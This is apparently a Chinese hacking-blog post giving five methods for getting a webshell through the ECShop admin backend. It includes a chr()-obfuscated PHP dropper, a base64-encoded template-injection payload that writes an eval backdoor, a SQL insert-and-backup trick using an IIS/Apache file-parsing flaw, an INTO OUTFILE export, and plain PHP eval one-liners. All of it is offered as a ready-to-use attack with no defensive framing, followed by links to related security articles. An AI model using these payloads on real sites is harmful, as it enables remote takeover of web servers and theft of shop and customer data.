Ecshop后台拿shell *** (版本自测)

hacker5年前黑客文章903

*** 一、

进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php

*** 二、

后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:u ***

代码:

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr
(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr
(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr
(75).chr(33); @fclose($fp); ?>

*** 三、

进后台
选择模版管理 – 语言项编辑
搜索“用户信息” 在用户信息后面加上:

${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}

然后确认修改, 访问根目录下user.php。在同目录下生成pcsli.php 一句话密码为:pcsli

*** 四、

用sql查询然后备份的 *** ,具体是找到数据库管理→SQL查询,然后执行SQL语句

建立新表 (ps:ECSHOP只调用了指定前缀的表 所以表名设为  ecs_cmd)

create table ecs_cmd(cmd text);

sasdfesgvgsdg 300x87 Ecshop后台拿shell方法(版本自测)

在新建立的表中插入一句话

insert into ecs_cmd(cmd) values(‘<php eval($_POST[cmd]);>’);

123we 300x84 Ecshop后台拿shell方法(版本自测)

在数据备份里面→点击自定义备份 可以看到我们新建立的表

45756855 300x83 Ecshop后台拿shell方法(版本自测)

选中它后直接备份名改成成x.php;(这是iis解析漏洞,如果是apache可以改成x.php.x.x.x) 就成功备份出来PHP一句话文件了 文件地址:chncto.com/data/sqldata/x.php;x.sql 直接上菜刀连接接即可

另外如果有root权限,也可以接着执行sql语句,导出一个shell

 select cmd from a into outfile ‘网站路径\eval.php’;

找网站路径可以用  use  数据库名;   或者有时也可以用 *** 三来爆出路径

*** 五、

后台–模版管理–库项目管理,选择一个库项目为myship.lbi-配送方式,在代码最下面插入php一句话木马:

<?php eval ($_POST[x]);?>

接着保存,一句话路径是:http://www.chncto.com/myship.php

标签: 黑客技术

相关文章

在渗透测试中使用fuzz技术

在渗透测试中使用fuzz技术

前言:本文翻译自sans.org,有删节。在学习sulley的过程中发现中文参考资料很少,所以抛砖引玉翻译一下,希望对学习协议fuzz测试的同学有帮助。本文适合作为学习sulley协议测试过程中参...

学好应用Striker等于你也就会应用了17个网络黑客专业技

学好应用Striker等于你也就会应用了17个网络黑客专业技

Striker是一个让人抵触的信息内容和漏洞扫描器。只必须了解网站域名,就可以完成自动化技术信息收集和漏洞检测;针对初学者非常的合适!   作用 只应向Striker出示网站域名,它便会全...

南方数据企业网站管理系统12.0拿SHELL方法

南方数据企业网站管理系统12.0插配置文件拿SHELL 在我们拿到南方数据企业管理系统后台账号密码后,可以使用下面的方法来拿shell 进入后台后 点击系统管理 网站配...

Sysinternals专用工具完全免费使用方法

Sysinternals专用工具完全免费使用方法

什么叫Sysinternals? Sysinternals Live是一项服务项目,可使您立即从互联网技术实行Sysinternals专用工具,而不用捕猎和手动式下载神器。只需在命令提示符或Wind...

各种网络环境渗透测试简述

一、渗透测试概念 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方...

SolarWinds服务器防火墙安全性管理工具

SolarWinds服务器防火墙安全性管理工具

什么叫SolarWinds? SolarWinds服务器防火墙安全性管理工具(FSM)针对必须在其重要安全防护设备上开展汇报和权威专家管理方法的机构和企业而言是一个非常好的解决方法。该商品的设定和配...